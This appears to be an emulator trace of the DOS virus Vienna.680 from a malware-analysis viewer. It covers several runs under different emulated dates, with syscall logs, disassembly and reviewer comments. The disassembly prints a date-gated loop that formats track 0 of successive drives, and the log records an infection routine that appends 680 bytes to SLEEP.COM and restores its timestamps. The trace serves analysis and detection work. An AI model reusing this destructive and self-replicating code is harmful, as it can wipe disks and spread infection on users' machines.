Sample viewer

vx.netlux.org/Virus.DOS.Vienna.680


Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:54:40.960487351Z 48 PC: 12a69 | Get DOS version
2018-12-17T22:54:40.962148225Z 47 PC: 12a75 | Get disk transfer address
2018-12-17T22:54:40.964597693Z 26 PC: 12a85 | Set disk transfer address
; Date gate: window printed after INT 21h AH=2Ah "Get date" (returns CX=year, DH=month, DL=day).
; All three tests below must pass before the loop at 0x12ab2 is reached; a run whose emulated date fails any of them jumps to 0x12ad2 instead.
; NOTE(review): the window looks like a fixed 20-instruction linear listing from the return address, not the executed path.
; This run logs three "Get date" rows (PC 12a94, 12aa0, 12aab), so the year and month tests both passed here.
2018-12-17T22:54:40.966438045Z 42 PC: 12a94 | Get date 0x12a94: cmp cx, 0x7c6    ; year against 0x7c6 (1990)
0x12a98: jge 0x12a9c    ; year >= 1990: continue with the month test
0x12a9a: jmp 0x12ad2    ; otherwise leave the gate (target lies beyond this window)
0x12a9c: mov ah, 0x2a
0x12a9e: int 0x21    ; "Get date" again
0x12aa0: cmp dh, 9    ; month against 9
0x12aa3: jge 0x12aa7
0x12aa5: jmp 0x12ad2
0x12aa7: mov ah, 0x2a
0x12aa9: int 0x21    ; "Get date" a third time
0x12aab: cmp dl, 4    ; day of month against 4
0x12aae: jge 0x12ab2
0x12ab0: jmp 0x12ad2
0x12ab2: mov al, byte ptr [0x334]    ; loop head: AL = counter byte at [0x334]
0x12ab5: call 0x12ac5    ; helper whose first instruction is the last line of this window
0x12ab8: cmp byte ptr [0x334], 0x19
0x12abd: je 0x12ad2    ; stop once the counter equals 0x19
0x12abf: inc byte ptr [0x334]
0x12ac3: loop 0x12ab2    ; dec CX, repeat while CX != 0
0x12ac5: mov ah, 5    ; helper entry; the window is cut here
; Window printed after the second "Get date" call (INT 21h AH=2Ah: DH=month, DL=day); reaching it means the year test passed.
; It runs through the helper at 0x12ac5, which issues INT 13h AH=05h (BIOS format track) on cylinder 0, head 0 of the drive in DL.
; NOTE(review): this is a destructive, date-gated path; the syscall table lists no INT 13h rows, so whether the call executed cannot be read from this log.
2018-12-17T22:54:40.969248743Z 42 PC: 12aa0 | Get date 0x12aa0: cmp dh, 9    ; month against 9
0x12aa3: jge 0x12aa7    ; month >= 9: continue with the day test
0x12aa5: jmp 0x12ad2    ; otherwise leave the gate
0x12aa7: mov ah, 0x2a
0x12aa9: int 0x21    ; "Get date" again
0x12aab: cmp dl, 4    ; day of month against 4
0x12aae: jge 0x12ab2
0x12ab0: jmp 0x12ad2
0x12ab2: mov al, byte ptr [0x334]    ; loop head: AL = counter byte at [0x334]
0x12ab5: call 0x12ac5    ; INT 13h helper below
0x12ab8: cmp byte ptr [0x334], 0x19
0x12abd: je 0x12ad2    ; stop once the counter equals 0x19
0x12abf: inc byte ptr [0x334]
0x12ac3: loop 0x12ab2    ; dec CX, repeat while CX != 0
0x12ac5: mov ah, 5    ; INT 13h function 05h: format track
0x12ac7: mov ch, 0    ; cylinder 0
0x12ac9: mov dh, 0    ; head 0
0x12acb: mov dl, byte ptr [0x334]    ; drive number = counter byte
0x12acf: int 0x13    ; BIOS disk service; overwrites the track if it succeeds
0x12ad1: ret
; Window printed after the third "Get date" call (INT 21h AH=2Ah: DL=day); reaching it means the year and month tests passed.
; It covers the day test, the INT 13h AH=05h (format track) loop, and the first instructions at 0x12ad2, the address every failed test jumps to.
; NOTE(review): the log does not show whether the day test passed in this run; no INT 13h rows are listed in the syscall table.
2018-12-17T22:54:40.972621197Z 42 PC: 12aab | Get date 0x12aab: cmp dl, 4    ; day of month against 4
0x12aae: jge 0x12ab2    ; day >= 4: enter the loop
0x12ab0: jmp 0x12ad2    ; otherwise skip it
0x12ab2: mov al, byte ptr [0x334]    ; loop head: AL = counter byte at [0x334]
0x12ab5: call 0x12ac5    ; INT 13h helper below
0x12ab8: cmp byte ptr [0x334], 0x19
0x12abd: je 0x12ad2    ; stop once the counter equals 0x19
0x12abf: inc byte ptr [0x334]
0x12ac3: loop 0x12ab2    ; dec CX, repeat while CX != 0
0x12ac5: mov ah, 5    ; INT 13h function 05h: format track
0x12ac7: mov ch, 0    ; cylinder 0
0x12ac9: mov dh, 0    ; head 0
0x12acb: mov dl, byte ptr [0x334]    ; drive number = counter byte
0x12acf: int 0x13    ; BIOS disk service; overwrites the track if it succeeds
0x12ad1: ret
0x12ad2: pop si    ; common exit of the date gate: SI = word on top of the stack
0x12ad3: push si    ; put it back, so the stack is unchanged
0x12ad4: add si, 0x2d
0x12ad7: lodsb al, byte ptr [si]    ; AL = byte at [SI], SI advances
0x12ad8: mov cx, 0x8000    ; window is cut here; what CX counts is not visible
2018-12-17T22:54:40.976118056Z 78 PC: 12b4a | Find first file
2018-12-17T22:54:40.983097977Z 67 PC: 12b86 | Get or set file attributes
2018-12-17T22:54:40.990227569Z 67 PC: 12b96 | Get or set file attributes
2018-12-17T22:54:41.008115821Z 61 PC: 12ba0 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:54:41.015032303Z 87 PC: 12bac | Get or set file date and time
; Window printed after INT 21h AH=2Ch "Get time" (DH=seconds). It shows the start of the file-modification sequence
; that the following log rows record: read 3 bytes, seek, write 680 bytes, seek, write 3 bytes on the opened SLEEP.COM handle.
; NOTE(review): "Get or set file date and time" and "Get or set file attributes" rows appear on both sides of the writes, which
; suggests they are saved and restored; if so, the file's timestamp is not a reliable change indicator — compare size or hash instead.
2018-12-17T22:54:41.028143608Z 44 PC: 12bb6 | Get time 0x12bb6: and dh, 7    ; keep the low three bits of the seconds value
0x12bb9: jmp 0x12bbb    ; jumps to the next instruction; no test of the masked value is visible here
0x12bbb: mov ah, 0x3f    ; INT 21h function 3Fh: read from handle (BX is set outside this window)
0x12bbd: mov cx, 3    ; three bytes
0x12bc0: mov dx, 0x1d
0x12bc3: add dx, si    ; buffer at [si + 0x1d]
0x12bc5: int 0x21
0x12bc7: jb 0x12c1c    ; carry set = DOS error: bail out
0x12bc9: cmp ax, 3
0x12bcc: jne 0x12c1c    ; short read: bail out
0x12bce: mov ax, 0x4202    ; INT 21h function 42h, AL=02h: seek relative to end of file
0x12bd1: mov cx, 0
0x12bd4: mov dx, 0    ; offset CX:DX = 0, so the call returns the file size
0x12bd7: int 0x21
0x12bd9: jb 0x12c1c
0x12bdb: mov cx, ax    ; CX = low word of the file size
0x12bdd: sub ax, 3
0x12be0: mov word ptr [si + 0x21], ax    ; size - 3 stored; presumably the operand of the 3-byte write logged later (confirm)
0x12be3: add cx, 0x30b
0x12be7: mov di, si    ; window is cut here
2018-12-17T22:54:41.030473702Z 63 PC: 12bc7 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:54:41.037281418Z 66 PC: 12bd9 | Move file pointer
2018-12-17T22:54:41.03952533Z 64 PC: 12bfc | Write file or device (Write 680 bytes on handle 5)
2018-12-17T22:54:41.049256155Z 66 PC: 12c0e | Move file pointer
2018-12-17T22:54:41.050858981Z 64 PC: 12c1c | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:54:41.058064566Z 87 PC: 12c2d | Get or set file date and time
2018-12-17T22:54:41.06087862Z 62 PC: 12c31 | Close file
2018-12-17T22:54:41.070574941Z 67 PC: 12c3e | Get or set file attributes
2018-12-17T22:54:41.081774961Z 26 PC: 12c49 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":11634,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:30:57.180076547Z 48 PC: 12a69 | Get DOS version
2018-12-25T12:30:57.182389307Z 47 PC: 12a75 | Get disk transfer address
2018-12-25T12:30:57.186014862Z 26 PC: 12a85 | Set disk transfer address
; Date gate: window printed after INT 21h AH=2Ah "Get date" (returns CX=year, DH=month, DL=day).
; All three tests below must pass before the loop at 0x12ab2 is reached; a run whose emulated date fails any of them jumps to 0x12ad2 instead.
; NOTE(review): the window looks like a fixed 20-instruction linear listing from the return address, not the executed path.
; This run logs a single "Get date" row, so execution left the gate at the year test; that fits the Year 1980 clock record printed above the run, assuming that record is this run's setting.
2018-12-25T12:30:57.18723001Z 42 PC: 12a94 | Get date 0x12a94: cmp cx, 0x7c6    ; year against 0x7c6 (1990)
0x12a98: jge 0x12a9c    ; year >= 1990: continue with the month test
0x12a9a: jmp 0x12ad2    ; otherwise leave the gate (target lies beyond this window)
0x12a9c: mov ah, 0x2a
0x12a9e: int 0x21    ; "Get date" again
0x12aa0: cmp dh, 9    ; month against 9
0x12aa3: jge 0x12aa7
0x12aa5: jmp 0x12ad2
0x12aa7: mov ah, 0x2a
0x12aa9: int 0x21    ; "Get date" a third time
0x12aab: cmp dl, 4    ; day of month against 4
0x12aae: jge 0x12ab2
0x12ab0: jmp 0x12ad2
0x12ab2: mov al, byte ptr [0x334]    ; loop head: AL = counter byte at [0x334]
0x12ab5: call 0x12ac5    ; helper whose first instruction is the last line of this window
0x12ab8: cmp byte ptr [0x334], 0x19
0x12abd: je 0x12ad2    ; stop once the counter equals 0x19
0x12abf: inc byte ptr [0x334]
0x12ac3: loop 0x12ab2    ; dec CX, repeat while CX != 0
0x12ac5: mov ah, 5    ; helper entry; the window is cut here
2018-12-25T12:30:57.197873887Z 78 PC: 12b4a | Find first file
2018-12-25T12:30:57.205978026Z 67 PC: 12b86 | Get or set file attributes
2018-12-25T12:30:57.212631651Z 67 PC: 12b96 | Get or set file attributes
2018-12-25T12:30:57.237768725Z 61 PC: 12ba0 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:30:57.259422463Z 87 PC: 12bac | Get or set file date and time
; Window printed after INT 21h AH=2Ch "Get time" (DH=seconds). It shows the start of the file-modification sequence
; that the following log rows record: read 3 bytes, seek, write 680 bytes, seek, write 3 bytes on the opened SLEEP.COM handle.
; NOTE(review): "Get or set file date and time" and "Get or set file attributes" rows appear on both sides of the writes, which
; suggests they are saved and restored; if so, the file's timestamp is not a reliable change indicator — compare size or hash instead.
2018-12-25T12:30:57.265622676Z 44 PC: 12bb6 | Get time 0x12bb6: and dh, 7    ; keep the low three bits of the seconds value
0x12bb9: jmp 0x12bbb    ; jumps to the next instruction; no test of the masked value is visible here
0x12bbb: mov ah, 0x3f    ; INT 21h function 3Fh: read from handle (BX is set outside this window)
0x12bbd: mov cx, 3    ; three bytes
0x12bc0: mov dx, 0x1d
0x12bc3: add dx, si    ; buffer at [si + 0x1d]
0x12bc5: int 0x21
0x12bc7: jb 0x12c1c    ; carry set = DOS error: bail out
0x12bc9: cmp ax, 3
0x12bcc: jne 0x12c1c    ; short read: bail out
0x12bce: mov ax, 0x4202    ; INT 21h function 42h, AL=02h: seek relative to end of file
0x12bd1: mov cx, 0
0x12bd4: mov dx, 0    ; offset CX:DX = 0, so the call returns the file size
0x12bd7: int 0x21
0x12bd9: jb 0x12c1c
0x12bdb: mov cx, ax    ; CX = low word of the file size
0x12bdd: sub ax, 3
0x12be0: mov word ptr [si + 0x21], ax    ; size - 3 stored; presumably the operand of the 3-byte write logged later (confirm)
0x12be3: add cx, 0x30b
0x12be7: mov di, si    ; window is cut here
2018-12-25T12:30:57.268215392Z 63 PC: 12bc7 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:30:57.276112503Z 66 PC: 12bd9 | Move file pointer
2018-12-25T12:30:57.278159698Z 64 PC: 12bfc | Write file or device (Write 680 bytes on handle 5)
2018-12-25T12:30:57.288495051Z 66 PC: 12c0e | Move file pointer
2018-12-25T12:30:57.290614403Z 64 PC: 12c1c | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:30:57.301083079Z 87 PC: 12c2d | Get or set file date and time
2018-12-25T12:30:57.305692866Z 62 PC: 12c31 | Close file
2018-12-25T12:30:57.317912317Z 67 PC: 12c3e | Get or set file attributes
2018-12-25T12:30:57.332031528Z 26 PC: 12c49 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1990,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":11634,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:30:57.264898882Z 48 PC: 12a69 | Get DOS version
2018-12-25T12:30:57.272089361Z 47 PC: 12a75 | Get disk transfer address
2018-12-25T12:30:57.273764646Z 26 PC: 12a85 | Set disk transfer address
; Date gate: window printed after INT 21h AH=2Ah "Get date" (returns CX=year, DH=month, DL=day).
; All three tests below must pass before the loop at 0x12ab2 is reached; a run whose emulated date fails any of them jumps to 0x12ad2 instead.
; NOTE(review): the window looks like a fixed 20-instruction linear listing from the return address, not the executed path.
; This run logs two "Get date" rows (PC 12a94, 12aa0): the year test passed and the month test did not, which fits the Year 1990 / Month 1 clock record printed above the run, assuming that record is this run's setting.
2018-12-25T12:30:57.275392989Z 42 PC: 12a94 | Get date 0x12a94: cmp cx, 0x7c6    ; year against 0x7c6 (1990)
0x12a98: jge 0x12a9c    ; year >= 1990: continue with the month test
0x12a9a: jmp 0x12ad2    ; otherwise leave the gate (target lies beyond this window)
0x12a9c: mov ah, 0x2a
0x12a9e: int 0x21    ; "Get date" again
0x12aa0: cmp dh, 9    ; month against 9
0x12aa3: jge 0x12aa7
0x12aa5: jmp 0x12ad2
0x12aa7: mov ah, 0x2a
0x12aa9: int 0x21    ; "Get date" a third time
0x12aab: cmp dl, 4    ; day of month against 4
0x12aae: jge 0x12ab2
0x12ab0: jmp 0x12ad2
0x12ab2: mov al, byte ptr [0x334]    ; loop head: AL = counter byte at [0x334]
0x12ab5: call 0x12ac5    ; helper whose first instruction is the last line of this window
0x12ab8: cmp byte ptr [0x334], 0x19
0x12abd: je 0x12ad2    ; stop once the counter equals 0x19
0x12abf: inc byte ptr [0x334]
0x12ac3: loop 0x12ab2    ; dec CX, repeat while CX != 0
0x12ac5: mov ah, 5    ; helper entry; the window is cut here
; Window printed after the second "Get date" call (INT 21h AH=2Ah: DH=month, DL=day); reaching it means the year test passed.
; It runs through the helper at 0x12ac5, which issues INT 13h AH=05h (BIOS format track) on cylinder 0, head 0 of the drive in DL.
; This is the last "Get date" row of the run, so the month test sent execution to 0x12ad2 and the INT 13h loop was not entered.
2018-12-25T12:30:57.278200777Z 42 PC: 12aa0 | Get date 0x12aa0: cmp dh, 9    ; month against 9
0x12aa3: jge 0x12aa7    ; month >= 9: continue with the day test
0x12aa5: jmp 0x12ad2    ; otherwise leave the gate
0x12aa7: mov ah, 0x2a
0x12aa9: int 0x21    ; "Get date" again
0x12aab: cmp dl, 4    ; day of month against 4
0x12aae: jge 0x12ab2
0x12ab0: jmp 0x12ad2
0x12ab2: mov al, byte ptr [0x334]    ; loop head: AL = counter byte at [0x334]
0x12ab5: call 0x12ac5    ; INT 13h helper below
0x12ab8: cmp byte ptr [0x334], 0x19
0x12abd: je 0x12ad2    ; stop once the counter equals 0x19
0x12abf: inc byte ptr [0x334]
0x12ac3: loop 0x12ab2    ; dec CX, repeat while CX != 0
0x12ac5: mov ah, 5    ; INT 13h function 05h: format track
0x12ac7: mov ch, 0    ; cylinder 0
0x12ac9: mov dh, 0    ; head 0
0x12acb: mov dl, byte ptr [0x334]    ; drive number = counter byte
0x12acf: int 0x13    ; BIOS disk service; overwrites the track if it succeeds
0x12ad1: ret
2018-12-25T12:30:57.281791087Z 78 PC: 12b4a | Find first file
2018-12-25T12:30:57.288967019Z 67 PC: 12b86 | Get or set file attributes
2018-12-25T12:30:57.2964557Z 67 PC: 12b96 | Get or set file attributes
2018-12-25T12:30:57.316703346Z 61 PC: 12ba0 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:30:57.32451858Z 87 PC: 12bac | Get or set file date and time
; Window printed after INT 21h AH=2Ch "Get time" (DH=seconds). It shows the start of the file-modification sequence
; that the following log rows record: read 3 bytes, seek, write 680 bytes, seek, write 3 bytes on the opened SLEEP.COM handle.
; NOTE(review): "Get or set file date and time" and "Get or set file attributes" rows appear on both sides of the writes, which
; suggests they are saved and restored; if so, the file's timestamp is not a reliable change indicator — compare size or hash instead.
2018-12-25T12:30:57.326400696Z 44 PC: 12bb6 | Get time 0x12bb6: and dh, 7    ; keep the low three bits of the seconds value
0x12bb9: jmp 0x12bbb    ; jumps to the next instruction; no test of the masked value is visible here
0x12bbb: mov ah, 0x3f    ; INT 21h function 3Fh: read from handle (BX is set outside this window)
0x12bbd: mov cx, 3    ; three bytes
0x12bc0: mov dx, 0x1d
0x12bc3: add dx, si    ; buffer at [si + 0x1d]
0x12bc5: int 0x21
0x12bc7: jb 0x12c1c    ; carry set = DOS error: bail out
0x12bc9: cmp ax, 3
0x12bcc: jne 0x12c1c    ; short read: bail out
0x12bce: mov ax, 0x4202    ; INT 21h function 42h, AL=02h: seek relative to end of file
0x12bd1: mov cx, 0
0x12bd4: mov dx, 0    ; offset CX:DX = 0, so the call returns the file size
0x12bd7: int 0x21
0x12bd9: jb 0x12c1c
0x12bdb: mov cx, ax    ; CX = low word of the file size
0x12bdd: sub ax, 3
0x12be0: mov word ptr [si + 0x21], ax    ; size - 3 stored; presumably the operand of the 3-byte write logged later (confirm)
0x12be3: add cx, 0x30b
0x12be7: mov di, si    ; window is cut here
2018-12-25T12:30:57.330276976Z 63 PC: 12bc7 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:30:57.338706077Z 66 PC: 12bd9 | Move file pointer
2018-12-25T12:30:57.340737728Z 64 PC: 12bfc | Write file or device (Write 680 bytes on handle 5)
2018-12-25T12:30:57.353297347Z 66 PC: 12c0e | Move file pointer
2018-12-25T12:30:57.354878548Z 64 PC: 12c1c | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:30:57.362197698Z 87 PC: 12c2d | Get or set file date and time
2018-12-25T12:30:57.364116171Z 62 PC: 12c31 | Close file
2018-12-25T12:30:57.373890772Z 67 PC: 12c3e | Get or set file attributes
2018-12-25T12:30:57.385197075Z 26 PC: 12c49 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":11634,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:30:57.52456384Z 48 PC: 12a69 | Get DOS version
2018-12-25T12:30:57.526179742Z 47 PC: 12a75 | Get disk transfer address
2018-12-25T12:30:57.527602619Z 26 PC: 12a85 | Set disk transfer address
; Date gate: window printed after INT 21h AH=2Ah "Get date" (returns CX=year, DH=month, DL=day).
; All three tests below must pass before the loop at 0x12ab2 is reached; a run whose emulated date fails any of them jumps to 0x12ad2 instead.
; NOTE(review): the window looks like a fixed 20-instruction linear listing from the return address, not the executed path.
; This run logs a single "Get date" row, so execution left the gate at the year test; that fits the Year 1980 clock record printed above the run, assuming that record is this run's setting.
2018-12-25T12:30:57.52877317Z 42 PC: 12a94 | Get date 0x12a94: cmp cx, 0x7c6    ; year against 0x7c6 (1990)
0x12a98: jge 0x12a9c    ; year >= 1990: continue with the month test
0x12a9a: jmp 0x12ad2    ; otherwise leave the gate (target lies beyond this window)
0x12a9c: mov ah, 0x2a
0x12a9e: int 0x21    ; "Get date" again
0x12aa0: cmp dh, 9    ; month against 9
0x12aa3: jge 0x12aa7
0x12aa5: jmp 0x12ad2
0x12aa7: mov ah, 0x2a
0x12aa9: int 0x21    ; "Get date" a third time
0x12aab: cmp dl, 4    ; day of month against 4
0x12aae: jge 0x12ab2
0x12ab0: jmp 0x12ad2
0x12ab2: mov al, byte ptr [0x334]    ; loop head: AL = counter byte at [0x334]
0x12ab5: call 0x12ac5    ; helper whose first instruction is the last line of this window
0x12ab8: cmp byte ptr [0x334], 0x19
0x12abd: je 0x12ad2    ; stop once the counter equals 0x19
0x12abf: inc byte ptr [0x334]
0x12ac3: loop 0x12ab2    ; dec CX, repeat while CX != 0
0x12ac5: mov ah, 5    ; helper entry; the window is cut here
2018-12-25T12:30:57.532340871Z 78 PC: 12b4a | Find first file
2018-12-25T12:30:57.541041639Z 67 PC: 12b86 | Get or set file attributes
2018-12-25T12:30:57.54783871Z 67 PC: 12b96 | Get or set file attributes
2018-12-25T12:30:57.564697524Z 61 PC: 12ba0 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:30:57.57272899Z 87 PC: 12bac | Get or set file date and time
; Window printed after INT 21h AH=2Ch "Get time" (DH=seconds). It shows the start of the file-modification sequence
; that the following log rows record: read 3 bytes, seek, write 680 bytes, seek, write 3 bytes on the opened SLEEP.COM handle.
; NOTE(review): "Get or set file date and time" and "Get or set file attributes" rows appear on both sides of the writes, which
; suggests they are saved and restored; if so, the file's timestamp is not a reliable change indicator — compare size or hash instead.
2018-12-25T12:30:57.574739103Z 44 PC: 12bb6 | Get time 0x12bb6: and dh, 7    ; keep the low three bits of the seconds value
0x12bb9: jmp 0x12bbb    ; jumps to the next instruction; no test of the masked value is visible here
0x12bbb: mov ah, 0x3f    ; INT 21h function 3Fh: read from handle (BX is set outside this window)
0x12bbd: mov cx, 3    ; three bytes
0x12bc0: mov dx, 0x1d
0x12bc3: add dx, si    ; buffer at [si + 0x1d]
0x12bc5: int 0x21
0x12bc7: jb 0x12c1c    ; carry set = DOS error: bail out
0x12bc9: cmp ax, 3
0x12bcc: jne 0x12c1c    ; short read: bail out
0x12bce: mov ax, 0x4202    ; INT 21h function 42h, AL=02h: seek relative to end of file
0x12bd1: mov cx, 0
0x12bd4: mov dx, 0    ; offset CX:DX = 0, so the call returns the file size
0x12bd7: int 0x21
0x12bd9: jb 0x12c1c
0x12bdb: mov cx, ax    ; CX = low word of the file size
0x12bdd: sub ax, 3
0x12be0: mov word ptr [si + 0x21], ax    ; size - 3 stored; presumably the operand of the 3-byte write logged later (confirm)
0x12be3: add cx, 0x30b
0x12be7: mov di, si    ; window is cut here
2018-12-25T12:30:57.577560849Z 63 PC: 12bc7 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:30:57.585728282Z 66 PC: 12bd9 | Move file pointer
2018-12-25T12:30:57.587574869Z 64 PC: 12bfc | Write file or device (Write 680 bytes on handle 5)
2018-12-25T12:30:57.597141107Z 66 PC: 12c0e | Move file pointer
2018-12-25T12:30:57.599034151Z 64 PC: 12c1c | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:30:57.612656779Z 87 PC: 12c2d | Get or set file date and time
2018-12-25T12:30:57.614801636Z 62 PC: 12c31 | Close file
2018-12-25T12:30:57.623883566Z 67 PC: 12c3e | Get or set file attributes
2018-12-25T12:30:57.635387557Z 26 PC: 12c49 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":9,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":11634,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:30:57.828877578Z 48 PC: 12a69 | Get DOS version
2018-12-25T12:30:57.830259541Z 47 PC: 12a75 | Get disk transfer address
2018-12-25T12:30:57.831267593Z 26 PC: 12a85 | Set disk transfer address
; Date gate: window printed after INT 21h AH=2Ah "Get date" (returns CX=year, DH=month, DL=day).
; All three tests below must pass before the loop at 0x12ab2 is reached; a run whose emulated date fails any of them jumps to 0x12ad2 instead.
; NOTE(review): the window looks like a fixed 20-instruction linear listing from the return address, not the executed path.
; This run logs a single "Get date" row, so execution left the gate at the year test; that fits the Year 1980 / Month 9 clock record printed above the run, assuming that record is this run's setting.
2018-12-25T12:30:57.832151712Z 42 PC: 12a94 | Get date 0x12a94: cmp cx, 0x7c6    ; year against 0x7c6 (1990)
0x12a98: jge 0x12a9c    ; year >= 1990: continue with the month test
0x12a9a: jmp 0x12ad2    ; otherwise leave the gate (target lies beyond this window)
0x12a9c: mov ah, 0x2a
0x12a9e: int 0x21    ; "Get date" again
0x12aa0: cmp dh, 9    ; month against 9
0x12aa3: jge 0x12aa7
0x12aa5: jmp 0x12ad2
0x12aa7: mov ah, 0x2a
0x12aa9: int 0x21    ; "Get date" a third time
0x12aab: cmp dl, 4    ; day of month against 4
0x12aae: jge 0x12ab2
0x12ab0: jmp 0x12ad2
0x12ab2: mov al, byte ptr [0x334]    ; loop head: AL = counter byte at [0x334]
0x12ab5: call 0x12ac5    ; helper whose first instruction is the last line of this window
0x12ab8: cmp byte ptr [0x334], 0x19
0x12abd: je 0x12ad2    ; stop once the counter equals 0x19
0x12abf: inc byte ptr [0x334]
0x12ac3: loop 0x12ab2    ; dec CX, repeat while CX != 0
0x12ac5: mov ah, 5    ; helper entry; the window is cut here
2018-12-25T12:30:57.833952235Z 78 PC: 12b4a | Find first file
2018-12-25T12:30:57.842383129Z 67 PC: 12b86 | Get or set file attributes
2018-12-25T12:30:57.846630763Z 67 PC: 12b96 | Get or set file attributes
2018-12-25T12:30:57.859211662Z 61 PC: 12ba0 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:30:57.864592684Z 87 PC: 12bac | Get or set file date and time
; Window printed after INT 21h AH=2Ch "Get time" (DH=seconds). It shows the start of the file-modification sequence
; that the following log rows record: read 3 bytes, seek, write 680 bytes, seek, write 3 bytes on the opened SLEEP.COM handle.
; NOTE(review): "Get or set file date and time" and "Get or set file attributes" rows appear on both sides of the writes, which
; suggests they are saved and restored; if so, the file's timestamp is not a reliable change indicator — compare size or hash instead.
2018-12-25T12:30:57.865650084Z 44 PC: 12bb6 | Get time 0x12bb6: and dh, 7    ; keep the low three bits of the seconds value
0x12bb9: jmp 0x12bbb    ; jumps to the next instruction; no test of the masked value is visible here
0x12bbb: mov ah, 0x3f    ; INT 21h function 3Fh: read from handle (BX is set outside this window)
0x12bbd: mov cx, 3    ; three bytes
0x12bc0: mov dx, 0x1d
0x12bc3: add dx, si    ; buffer at [si + 0x1d]
0x12bc5: int 0x21
0x12bc7: jb 0x12c1c    ; carry set = DOS error: bail out
0x12bc9: cmp ax, 3
0x12bcc: jne 0x12c1c    ; short read: bail out
0x12bce: mov ax, 0x4202    ; INT 21h function 42h, AL=02h: seek relative to end of file
0x12bd1: mov cx, 0
0x12bd4: mov dx, 0    ; offset CX:DX = 0, so the call returns the file size
0x12bd7: int 0x21
0x12bd9: jb 0x12c1c
0x12bdb: mov cx, ax    ; CX = low word of the file size
0x12bdd: sub ax, 3
0x12be0: mov word ptr [si + 0x21], ax    ; size - 3 stored; presumably the operand of the 3-byte write logged later (confirm)
0x12be3: add cx, 0x30b
0x12be7: mov di, si    ; window is cut here
2018-12-25T12:30:57.867246686Z 63 PC: 12bc7 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:30:57.872401822Z 66 PC: 12bd9 | Move file pointer
2018-12-25T12:30:57.87914754Z 64 PC: 12bfc | Write file or device (Write 680 bytes on handle 5)
2018-12-25T12:30:57.885177798Z 66 PC: 12c0e | Move file pointer
2018-12-25T12:30:57.887364264Z 64 PC: 12c1c | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:30:57.891684308Z 87 PC: 12c2d | Get or set file date and time
2018-12-25T12:30:57.893124669Z 62 PC: 12c31 | Close file
2018-12-25T12:30:57.908784526Z 67 PC: 12c3e | Get or set file attributes
2018-12-25T12:30:57.919502036Z 26 PC: 12c49 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":11634,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:30:58.167423774Z 48 PC: 12a69 | Get DOS version
2018-12-25T12:30:58.169940317Z 47 PC: 12a75 | Get disk transfer address
2018-12-25T12:30:58.171636237Z 26 PC: 12a85 | Set disk transfer address
; Date gate: window printed after INT 21h AH=2Ah "Get date" (returns CX=year, DH=month, DL=day).
; All three tests below must pass before the loop at 0x12ab2 is reached; a run whose emulated date fails any of them jumps to 0x12ad2 instead.
; NOTE(review): the window looks like a fixed 20-instruction linear listing from the return address, not the executed path.
; This run logs a single "Get date" row, so execution left the gate at the year test; that fits the Year 1980 clock record printed above the run, assuming that record is this run's setting.
2018-12-25T12:30:58.173309846Z 42 PC: 12a94 | Get date 0x12a94: cmp cx, 0x7c6    ; year against 0x7c6 (1990)
0x12a98: jge 0x12a9c    ; year >= 1990: continue with the month test
0x12a9a: jmp 0x12ad2    ; otherwise leave the gate (target lies beyond this window)
0x12a9c: mov ah, 0x2a
0x12a9e: int 0x21    ; "Get date" again
0x12aa0: cmp dh, 9    ; month against 9
0x12aa3: jge 0x12aa7
0x12aa5: jmp 0x12ad2
0x12aa7: mov ah, 0x2a
0x12aa9: int 0x21    ; "Get date" a third time
0x12aab: cmp dl, 4    ; day of month against 4
0x12aae: jge 0x12ab2
0x12ab0: jmp 0x12ad2
0x12ab2: mov al, byte ptr [0x334]    ; loop head: AL = counter byte at [0x334]
0x12ab5: call 0x12ac5    ; helper whose first instruction is the last line of this window
0x12ab8: cmp byte ptr [0x334], 0x19
0x12abd: je 0x12ad2    ; stop once the counter equals 0x19
0x12abf: inc byte ptr [0x334]
0x12ac3: loop 0x12ab2    ; dec CX, repeat while CX != 0
0x12ac5: mov ah, 5    ; helper entry; the window is cut here
2018-12-25T12:30:58.176279909Z 78 PC: 12b4a | Find first file
2018-12-25T12:30:58.188735373Z 67 PC: 12b86 | Get or set file attributes
2018-12-25T12:30:58.194949165Z 67 PC: 12b96 | Get or set file attributes
2018-12-25T12:30:58.220553917Z 61 PC: 12ba0 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:30:58.226663007Z 87 PC: 12bac | Get or set file date and time
; Window printed after INT 21h AH=2Ch "Get time" (DH=seconds). It shows the start of the file-modification sequence
; that the following log rows record: read 3 bytes, seek, write 680 bytes, seek, write 3 bytes on the opened SLEEP.COM handle.
; NOTE(review): "Get or set file date and time" and "Get or set file attributes" rows appear on both sides of the writes, which
; suggests they are saved and restored; if so, the file's timestamp is not a reliable change indicator — compare size or hash instead.
